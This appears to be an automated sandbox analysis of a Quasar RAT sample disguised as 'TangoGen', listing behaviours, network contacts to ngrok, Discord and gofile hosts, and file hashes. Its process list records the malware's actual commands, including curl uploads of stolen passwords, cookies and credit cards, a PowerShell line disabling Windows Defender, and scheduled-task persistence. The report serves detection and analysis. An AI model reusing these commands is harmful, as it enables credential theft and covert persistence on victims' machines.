Analysis Overview
SHA256
eb6f8f2a7f814d765640c5e6422921576383c85183677c8c1328f846bda5906e
Threat Level: Known bad
The file TangoGen.rar was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
UPX packed file
Drops startup file
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Unsigned PE
Enumerates physical storage devices
Detects Pyinstaller
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Opens file in notepad (likely ransom note)
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Checks processor information in registry
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-22 14:59
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-22 14:58
Reported
2024-04-22 15:04
Platform
win11-20240412-en
Max time kernel
298s
Max time network
304s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\System32.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\System32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EPICGA~1.EXE | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\EPICGA~1.EXE | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\TangoGen\TangoGenV1.3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TANGOG~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TANGOG~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DMMEIF~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WINDOW~1.EXE | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | 6.tcp.ngrok.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | 6.tcp.ngrok.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | 6.tcp.ngrok.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | 6.tcp.ngrok.io | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\TangoGen\TangoGenV1.3.exe
"C:\Users\Admin\AppData\Local\Temp\TangoGen\TangoGenV1.3.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TANGOG~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TANGOG~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Built.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Built.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TANGOG~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TANGOG~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TANGOG~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TANGOG~1.EXE
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TANGOG~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TANGOG~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DMMEIF~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DMMEIF~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\System32.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\System32.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\System32.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\System32.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\EPICGA~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\EPICGA~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\EPICGA~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\EPICGA~1.EXE
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"
C:\Windows\SysWOW64\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"
C:\Windows\SysWOW64\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"
C:\Windows\SysWOW64\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"
C:\Windows\SysWOW64\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"
C:\Windows\SysWOW64\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"
C:\Windows\SysWOW64\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WINDOW~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WINDOW~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\svchost.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\svchost.exe
C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe
"C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /Create /TN "Intel Processor ©" /XML "C:\Users\Admin\AppData\Local\Temp\tmp36F9.tmp" /F
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 74.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| N/A | 127.0.0.1:50542 | tcp | |
| N/A | 127.0.0.1:50552 | tcp | |
| N/A | 127.0.0.1:50558 | tcp | |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.140.223.7:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.141.142.211:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.142.211:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.142.211:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.141.142.211:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.142.211:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.142.211:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.141.142.211:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.142.211:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.142.211:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.141.142.211:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.142.211:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.141.142.211:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.142.211:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.142.211:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.132.159.158:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.132.159.158:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.132.159.158:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.132.159.158:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.132.159.158:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.132.159.158:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.132.159.158:17147 | 6.tcp.ngrok.io | tcp |
| US | 3.132.159.158:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.132.159.158:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.132.159.158:16799 | 6.tcp.ngrok.io | tcp |
| US | 3.132.159.158:17147 | 6.tcp.ngrok.io | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TANGOG~1.EXE
| MD5 | ea0f2bf412f49a4d131e186647e430fa |
| SHA1 | a05b3d2e924b385089fcf477155c11af0d3852af |
| SHA256 | f29dad7c38548748e8705ff719b4bba758bae20561318a91b3f4de65e715f6c9 |
| SHA512 | d360a148f83b4f5b2b03a445f566549aa1cf187640b4cd81d4854845f0415c96ea46f4a8afdb75ab03d0987b28fbf8eaf8d4a332b4d1c8587c77255188f97587 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Built.exe
| MD5 | 415b798b89de60513a68357847e0892d |
| SHA1 | 76703f5121b80e67a4b55fba3a68ea57d452952b |
| SHA256 | b4d710f8d33014f5b77ff61f10bc70df4eec50e0a954c7ef5f09fb75e62ca110 |
| SHA512 | c6463d4e828cd18c4f95e11023a2d85e8a24bcce8a2b616d23a6b76f47a45a7a77f6b66d2d09f88228252ace251150216086c159e4a5e73489ef5349ecd213dd |
memory/1032-13-0x00007FF8A7930000-0x00007FF8A83F2000-memory.dmp
memory/1032-14-0x0000000000070000-0x0000000000394000-memory.dmp
memory/1032-15-0x000000001B040000-0x000000001B050000-memory.dmp
memory/1032-23-0x00007FF8A7930000-0x00007FF8A83F2000-memory.dmp
memory/656-22-0x00007FF8A7930000-0x00007FF8A83F2000-memory.dmp
memory/656-24-0x000000001B040000-0x000000001B050000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TANGOG~1.EXE
| MD5 | 418826371c8cb889128cdfa3615fa99d |
| SHA1 | d4bfaf14d2801611e2a64120aba2a2eb0fb52d4a |
| SHA256 | 48d96c17a1f0557d4ded682f7bd4179d463327685543b23100ef9152fa54412b |
| SHA512 | c1fcad76fe6cf5d1af8168f334226a7153a4ac407efe93393f008e35f2ee5db4eb7091ea65a1d56f66d99696013192c214d54ecd022d883104b4325132628044 |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TANGOG~1.EXE
| MD5 | cca4410ce6b5c64389e221899c7924f5 |
| SHA1 | b43ecf2734266f0a0648ff6909eeab0b7cd162be |
| SHA256 | 5263a206f4c5bfaf4d64778507820df4e04273e19f767df253aa20fae1e31647 |
| SHA512 | 616bb3a340e2a1ebf9c13d40868a2d3207b159757d9034621ecdec9d3c223e876a7cdcc39149d1e27b740cad937ccb8d36d79d418267c84393349d57b295d74e |
memory/656-85-0x000000001BC70000-0x000000001BCC0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI22762\ucrtbase.dll
| MD5 | 0e0bac3d1dcc1833eae4e3e4cf83c4ef |
| SHA1 | 4189f4459c54e69c6d3155a82524bda7549a75a6 |
| SHA256 | 8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae |
| SHA512 | a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd |
C:\Users\Admin\AppData\Local\Temp\_MEI22762\python310.dll
| MD5 | 384349987b60775d6fc3a6d202c3e1bd |
| SHA1 | 701cb80c55f859ad4a31c53aa744a00d61e467e5 |
| SHA256 | f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8 |
| SHA512 | 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5 |
C:\Users\Admin\AppData\Local\Temp\_MEI22762\VCRUNTIME140.dll
| MD5 | 11d9ac94e8cb17bd23dea89f8e757f18 |
| SHA1 | d4fb80a512486821ad320c4fd67abcae63005158 |
| SHA256 | e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e |
| SHA512 | aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778 |
C:\Users\Admin\AppData\Local\Temp\_MEI22762\base_library.zip
| MD5 | 9aba9e5878e6970f63052d2ef51178d2 |
| SHA1 | ad54dda7f4e4c8efcf67cf7bad36b94b3d24524a |
| SHA256 | 779456b65d35fe8cb4b03d6d8b13c7ea375d176aa307cfe648c1a8af3bb9118c |
| SHA512 | 98081eb4f554f26ecae641a00b276c7db029980abc373d8a76f56d6d473db460e426f402a0dd06f03b26dfb7c65b40ad6afc9cddf1a6333eb06858e33e688a3d |
C:\Users\Admin\AppData\Local\Temp\_MEI22762\_ctypes.pyd
| MD5 | 79f339753dc8954b8eb45fe70910937e |
| SHA1 | 3ad1bf9872dc779f32795988eb85c81fe47b3dd4 |
| SHA256 | 35cdd122679041ebef264de5626b7805f3f66c8ae6cc451b8bc520be647fa007 |
| SHA512 | 21e567e813180ed0480c4b21be3e2e67974d8d787e663275be054cee0a3f5161fc39034704dbd25f1412feb021d6a21b300a32d1747dee072820be81b9d9b753 |
C:\Users\Admin\AppData\Local\Temp\_MEI22762\_hashlib.pyd
| MD5 | cfb9e0a73a6c9d6d35c2594e52e15234 |
| SHA1 | b86042c96f2ce6d8a239b7d426f298a23df8b3b9 |
| SHA256 | 50daeb3985302a8d85ce8167b0bf08b9da43e7d51ceae50e8e1cdfb0edf218c6 |
| SHA512 | 22a5fd139d88c0eee7241c5597d8dbbf2b78841565d0ed0df62383ab50fde04b13a203bddef03530f8609f5117869ed06894a572f7655224285823385d7492d2 |
C:\Users\Admin\AppData\Local\Temp\_MEI22762\_decimal.pyd
| MD5 | 1cdd7239fc63b7c8a2e2bc0a08d9ea76 |
| SHA1 | 85ef6f43ba1343b30a223c48442a8b4f5254d5b0 |
| SHA256 | 384993b2b8cfcbf155e63f0ee2383a9f9483de92ab73736ff84590a0c4ca2690 |
| SHA512 | ba4e19e122f83d477cc4be5e0dea184dafba2f438a587dd4f0ef038abd40cb9cdc1986ee69c34bac3af9cf2347bea137feea3b82e02cca1a7720d735cea7acda |
